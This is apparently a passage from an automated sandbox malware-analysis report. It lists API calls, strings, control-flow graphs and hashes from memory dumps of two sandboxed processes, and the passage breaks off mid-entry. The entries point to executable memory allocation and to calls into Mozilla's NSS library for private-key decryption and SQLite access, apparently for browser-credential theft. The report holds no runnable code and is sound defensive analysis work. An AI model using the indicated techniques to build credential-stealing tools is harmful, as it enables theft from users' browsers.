                                                                                • Source File: 00000008.00000002.2367245852.0000000004299000.00000040.00001000.00020000.00000000.sdmp, Offset: 04299000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_4299000_9EDA.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocChangeCloseCreateFileFindNotificationVirtual
                                                                                • String ID: @
                                                                                • API String ID: 482251274-2766056989
                                                                                • Opcode ID: 0e0dc5585c33f2c4c31cdc6bfcf1500614589984357103c7c5ed85e8348694b7
                                                                                • Instruction ID: 54c68940dbce80f5b42ee03065d23d88ad41cc187615c2bd714e8540d57a08bd
                                                                                • Opcode Fuzzy Hash: 0e0dc5585c33f2c4c31cdc6bfcf1500614589984357103c7c5ed85e8348694b7
                                                                                • Instruction Fuzzy Hash: 5881FC71A10218AFEB24DF54DC55FDAB3B5EF48710F1481A9EA09AB390D7B06E84CF94

                                                                                Control-flow Graph

                                                                                control_flow_graph 59 4299b10-4299b75 call 4299740 62 4299b7e-4299b93 59->62 63 4299b77-4299b79 59->63 65 4299b9c-4299bb4 62->65 66 4299b95-4299b97 62->66 64 4299c81-4299c84 63->64 67 4299bbf-4299bc9 65->67 66->64 68 4299bcb-4299bdb 67->68 69 4299c17-4299c1b 67->69 70 4299bdd-4299c13 68->70 71 4299c15 68->71 72 4299c29-4299c2b 69->72 73 4299c1d-4299c21 69->73 70->69 71->67 72->64 73->72 74 4299c23-4299c27 73->74 74->72 76 4299c2d-4299c7c NtProtectVirtualMemory call 429a150 NtProtectVirtualMemory 74->76 76->64
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2367245852.0000000004299000.00000040.00001000.00020000.00000000.sdmp, Offset: 04299000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_4299000_9EDA.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .tex
                                                                                • API String ID: 0-1946526065
                                                                                • Opcode ID: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
                                                                                • Instruction ID: 6b04d5b24fc21ad9fb189ae4922a7d96e79ab106fc74996b72f6685918cab89e
                                                                                • Opcode Fuzzy Hash: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
                                                                                • Instruction Fuzzy Hash: 2951D3B1E101099FCF04CF84C894BEEBBF5EF48314F248599D915AB380D775AA85CBA0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,0429990F,00003000,00000040), ref: 0429A034
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2367245852.0000000004299000.00000040.00001000.00020000.00000000.sdmp, Offset: 04299000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_4299000_9EDA.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: VirtualAlloc
                                                                                • API String ID: 4275171209-164498762
                                                                                • Opcode ID: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                                                                • Instruction ID: 16514c8a24616c27c4f27de8bb6f2df99b0ec3f767ee42b635012bd32b9c15d7
                                                                                • Opcode Fuzzy Hash: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                                                                • Instruction Fuzzy Hash: 9211D0A0D083C9EAFF01DBE898097EEBFB55F15708F044098D9446A282D6BA5758C7A6
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D017C33
                                                                                • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6D017C66
                                                                                • CERT_DestroyCertificate.NSS3(00000000), ref: 6D017D1E
                                                                                  • Part of subcall function 6D017870: SECOID_FindOID_Util.NSS3(?,?,?,6D0191C5), ref: 6D01788F
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D017D48
                                                                                • PR_SetError.NSS3(FFFFE067,00000000), ref: 6D017D71
                                                                                • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6D017DD3
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D017DE1
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D017DF8
                                                                                • SECKEY_DestroyPublicKey.NSS3(?), ref: 6D017E1A
                                                                                • PR_SetError.NSS3(FFFFE067,00000000), ref: 6D017E58
                                                                                  • Part of subcall function 6D017870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D0191C5), ref: 6D0178BB
                                                                                  • Part of subcall function 6D017870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6D0191C5), ref: 6D0178FA
                                                                                  • Part of subcall function 6D017870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6D0191C5), ref: 6D017930
                                                                                  • Part of subcall function 6D017870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6D0191C5), ref: 6D017951
                                                                                  • Part of subcall function 6D017870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6D017964
                                                                                  • Part of subcall function 6D017870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6D01797A
                                                                                  • Part of subcall function 6D017870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6D017988
                                                                                  • Part of subcall function 6D017870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6D017998
                                                                                  • Part of subcall function 6D017870: free.MOZGLUE(00000000), ref: 6D0179A7
                                                                                  • Part of subcall function 6D017870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6D0191C5), ref: 6D0179BB
                                                                                  • Part of subcall function 6D017870: PR_GetCurrentThread.NSS3(?,?,?,?,6D0191C5), ref: 6D0179CA
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D017E49
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D017F8C
                                                                                • SECKEY_DestroyPublicKey.NSS3(?), ref: 6D017F98
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D017FBF
                                                                                • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6D017FD9
                                                                                • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6D018038
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6D018050
                                                                                • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6D018093
                                                                                • SECOID_FindOID_Util.NSS3 ref: 6D017F29
                                                                                  • Part of subcall function 6D0107B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CFB8298,?,?,?,6CFAFCE5,?), ref: 6D0107BF
                                                                                  • Part of subcall function 6D0107B0: PL_HashTableLookup.NSS3(?,?), ref: 6D0107E6
                                                                                  • Part of subcall function 6D0107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D01081B
                                                                                  • Part of subcall function 6D0107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D010825
                                                                                • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6D018072
                                                                                • SECOID_FindOID_Util.NSS3 ref: 6D0180F5
                                                                                  • Part of subcall function 6D01BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6D01800A,00000000,?,00000000,?), ref: 6D01BC3F
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                                                • String ID:
                                                                                • API String ID: 2815116071-0
                                                                                • Opcode ID: b064d8693c197394bb9ff171fb3d14d052cd629ae44592a52e4f502f386cfc27
                                                                                • Instruction ID: c78bb475ea56feff6f30eec668e87a57b9eb334f9f3454585080427ab34218da
                                                                                • Opcode Fuzzy Hash: b064d8693c197394bb9ff171fb3d14d052cd629ae44592a52e4f502f386cfc27
                                                                                • Instruction Fuzzy Hash: 2CE16C71A0C202EFF711CF64CC80B6A77E5BF89308F55496CE99A9B251E731E905CB92
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 6CFA1C6B
                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6CFA1C75
                                                                                • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6CFA1CA1
                                                                                • GetLengthSid.ADVAPI32(?), ref: 6CFA1CA9
                                                                                • malloc.MOZGLUE(00000000), ref: 6CFA1CB4
                                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 6CFA1CCC
                                                                                • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6CFA1CE4
                                                                                • GetLengthSid.ADVAPI32(?), ref: 6CFA1CEC
                                                                                • malloc.MOZGLUE(00000000), ref: 6CFA1CFD
                                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 6CFA1D0F
                                                                                • CloseHandle.KERNEL32(?), ref: 6CFA1D17
                                                                                • AllocateAndInitializeSid.ADVAPI32 ref: 6CFA1D4D
                                                                                • GetLastError.KERNEL32 ref: 6CFA1D73
                                                                                • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6CFA1D7F
                                                                                Strings
                                                                                • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6CFA1D7A
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                                                • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                                                • API String ID: 3748115541-1216436346
                                                                                • Opcode ID: 571b2237b98a884af39a189a5d1c090c027618c2c0445f981310a00929639b6a
                                                                                • Instruction ID: 1f16a4e271431df25b44e3ceb1ab9fb43ebd3e76f59b58c8183cab674830ce17
                                                                                • Opcode Fuzzy Hash: 571b2237b98a884af39a189a5d1c090c027618c2c0445f981310a00929639b6a
                                                                                • Instruction Fuzzy Hash: 3D3195B5900218EFEF10EF64DC48BAABBB9FF4A304F004069FA09D2151EB705994CF65
                                                                                APIs
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF51D58
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CF51EFD
                                                                                • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6CF51FB7
                                                                                Strings
                                                                                • unknown error, xrefs: 6CF52291
                                                                                • attached databases must use the same text encoding as main database, xrefs: 6CF520CA
                                                                                • unsupported file format, xrefs: 6CF52188
                                                                                • sqlite_master, xrefs: 6CF51C61
                                                                                • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6CF51F83
                                                                                • no more rows available, xrefs: 6CF52264
                                                                                • another row available, xrefs: 6CF52287
                                                                                • table, xrefs: 6CF51C8B
                                                                                • sqlite_temp_master, xrefs: 6CF51C5C
                                                                                • abort due to ROLLBACK, xrefs: 6CF52223
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                 • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                                                • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                                                • API String ID: 563213449-2102270813
                                                                                • Opcode ID: 5884be84fb915420455319ebd1848284fd21bf0f558027c068fa5c3acfbff641
                                                                                • Instruction ID: bf3d8ca8fab2100f647a4be709942426630333b87f97ef49fbedb2a79a2452b2
                                                                                • Opcode Fuzzy Hash: 5884be84fb915420455319ebd1848284fd21bf0f558027c068fa5c3acfbff641
                                                                                • Instruction Fuzzy Hash: 4112DF706083019FD714CF19C484B5ABBF2BF95318F59866DEA898B712D732EC56CB82
                                                                                APIs
                                                                                • PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6CFDFD06
                                                                                  • Part of subcall function 6CFDF670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6CFDF696
                                                                                  • Part of subcall function 6CFDF670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6CFDF789
                                                                                  • Part of subcall function 6CFDF670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6CFDF796
                                                                                  • Part of subcall function 6CFDF670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6CFDF79F
                                                                                  • Part of subcall function 6CFDF670: SECITEM_DupItem_Util.NSS3 ref: 6CFDF7F0
                                                                                  • Part of subcall function 6D003440: PK11_GetAllTokens.NSS3 ref: 6D003481
                                                                                  • Part of subcall function 6D003440: PR_SetError.NSS3(00000000,00000000), ref: 6D0034A3
                                                                                  • Part of subcall function 6D003440: TlsGetValue.KERNEL32 ref: 6D00352E
                                                                                  • Part of subcall function 6D003440: EnterCriticalSection.KERNEL32(?), ref: 6D003542
                                                                                  • Part of subcall function 6D003440: PR_Unlock.NSS3(?), ref: 6D00355B
                                                                                • SECITEM_DupItem_Util.NSS3(?), ref: 6CFDFDAD
                                                                                  • Part of subcall function 6D00FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CFB9003,?), ref: 6D00FD91
                                                                                  • Part of subcall function 6D00FD80: PORT_Alloc_Util.NSS3(A4686D01,?), ref: 6D00FDA2
                                                                                  • Part of subcall function 6D00FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686D01,?,?), ref: 6D00FDC4
                                                                                • SECITEM_DupItem_Util.NSS3(?), ref: 6CFDFE00
                                                                                  • Part of subcall function 6D00FD80: free.MOZGLUE(00000000,?,?), ref: 6D00FDD1
                                                                                  • Part of subcall function 6CFFE550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFFE5A0
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFDFEBB
                                                                                • PK11_FreeSymKey.NSS3(00000000), ref: 6CFDFEC8
                                                                                • PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6CFDFED3
                                                                                • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CFDFF0C
                                                                                • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CFDFF23
                                                                                • PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6CFDFF4D
                                                                                • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CFDFFDA
                                                                                • PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6CFE0007
                                                                                • PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6CFE0029
                                                                                • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CFE0044
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                 • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
                                                                                • String ID:
                                                                                • API String ID: 138705723-0
                                                                                • Opcode ID: 0a3f1c8351c84a5fa6cdf7ad015bd74d90945ef666989a9b4edcaf1cf19f5465
                                                                                • Instruction ID: 8635ceeaaec17a66f9bd3e0f9680fe63e6e7bb24ef1c5bc68667962f2d70c422
                                                                                • Opcode Fuzzy Hash: 0a3f1c8351c84a5fa6cdf7ad015bd74d90945ef666989a9b4edcaf1cf19f5465
                                                                                • Instruction Fuzzy Hash: ACB19271604201AFE704CF29CC40E6BB7E5FF88318F5A8A1DE999C7651E770E945CB92
                                                                                APIs
                                                                                • SECOID_FindOID_Util.NSS3(?), ref: 6CFD7DDC
                                                                                  • Part of subcall function 6D0107B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CFB8298,?,?,?,6CFAFCE5,?), ref: 6D0107BF
                                                                                  • Part of subcall function 6D0107B0: PL_HashTableLookup.NSS3(?,?), ref: 6D0107E6
                                                                                  • Part of subcall function 6D0107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D01081B
                                                                                  • Part of subcall function 6D0107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D010825
                                                                                • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CFD7DF3
                                                                                • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6CFD7F07
                                                                                • PK11_GetPadMechanism.NSS3(00000000), ref: 6CFD7F57
                                                                                • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6CFD7F98
                                                                                • PK11_FreeSymKey.NSS3(?), ref: 6CFD7FC9
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CFD7FDE
                                                                                • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6CFD8000
                                                                                  • Part of subcall function 6CFF9430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6CFD7F0C,?,00000000,00000000,00000000,?), ref: 6CFF943B
                                                                                  • Part of subcall function 6CFF9430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6CFF946B
                                                                                  • Part of subcall function 6CFF9430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6CFF9546
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CFD8110
                                                                                • PK11_FreeSymKey.NSS3(00000000), ref: 6CFD811D
                                                                                • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CFD822D
                                                                                • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CFD823C
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                 • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                                                • String ID:
                                                                                • API String ID: 1923011919-0
                                                                                • Opcode ID: 93169f46af4cc258972e72111d59ab8f93ab5767a8b8c98b6dcd069c2669c529
                                                                                • Instruction ID: 39188d6c530e629e9be5eb0d5fdda60e85ee50f1a60f9113e795ce3ff1a82bc4
                                                                                • Opcode Fuzzy Hash: 93169f46af4cc258972e72111d59ab8f93ab5767a8b8c98b6dcd069c2669c529
                                                                                • Instruction Fuzzy Hash: 15C151B1D002599BEB21CF14CC44FDAB7B8EB05308F0581EAE919A7651E771AE85CF91
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CFB1C6F,00000000,00000004,?,?), ref: 6D006C3F
                                                                                  • Part of subcall function 6D05C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D05C2BF
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CFB1C6F,00000000,00000004,?,?), ref: 6D006C60
                                                                                • PR_ExplodeTime.NSS3(00000000,6CFB1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CFB1C6F,00000000,00000004,?,?), ref: 6D006C94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                 • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                • API String ID: 3534712800-180463219
                                                                                • Opcode ID: c671b009387410b8282a52bae8b29e2dc6aa0eb81aa9c6d673742e38e432f8a5
                                                                                • Instruction ID: 9deed1c790e82ce3f5ec05c4b6fb300b655a89348b7661a53ce7212af898dcdd
                                                                                • Opcode Fuzzy Hash: c671b009387410b8282a52bae8b29e2dc6aa0eb81aa9c6d673742e38e432f8a5
                                                                                • Instruction Fuzzy Hash: 07513B72B015494BD70CCDADDC517DEB7DAABA4310F48C23AE442DB781D678D902C791
                                                                                APIs
                                                                                • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6D01BD48
                                                                                • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6D01BD68
                                                                                • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6D01BD83
                                                                                • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6D01BD9E
                                                                                • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6D01BDB9
                                                                                • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6D01BDD0
                                                                                • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6D01BDEA
                                                                                • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6D01BE04
                                                                                • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6D01BE1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                 • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: AlgorithmPolicy
                                                                                • String ID:
                                                                                • API String ID: 2721248240-0
                                                                                • Opcode ID: 17bd3cd9c54a6bfc2ea525f9ab4fa43a1ea5899a9250868953b7ae12312f6da8
                                                                                • Instruction ID: 03727015eb8d22d987f4707369f4dbef1a1dd15de3ecec24f2e2e0ab1514e3dc
                                                                                • Opcode Fuzzy Hash: 17bd3cd9c54a6bfc2ea525f9ab4fa43a1ea5899a9250868953b7ae12312f6da8
                                                                                • Instruction Fuzzy Hash: 952151A6E0C25A57FB0046D69C42B6B76F4BB93749F050028FA16EF341F761942486A6
                                                                                APIs
                                                                                • PR_CallOnce.NSS3(6D1114E4,6D07CC70), ref: 6D0C8D47
                                                                                • PR_GetCurrentThread.NSS3 ref: 6D0C8D98
                                                                                  • Part of subcall function 6CFA0F00: PR_GetPageSize.NSS3(6CFA0936,FFFFE8AE,?,6CF316B7,00000000,?,6CFA0936,00000000,?,6CF3204A), ref: 6CFA0F1B
                                                                                  • Part of subcall function 6CFA0F00: PR_NewLogModule.NSS3(clock,6CFA0936,FFFFE8AE,?,6CF316B7,00000000,?,6CFA0936,00000000,?,6CF3204A), ref: 6CFA0F25
                                                                                • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6D0C8E7B
                                                                                • htons.WSOCK32(?), ref: 6D0C8EDB
                                                                                • PR_GetCurrentThread.NSS3 ref: 6D0C8F99
                                                                                • PR_GetCurrentThread.NSS3 ref: 6D0C910A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                 • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
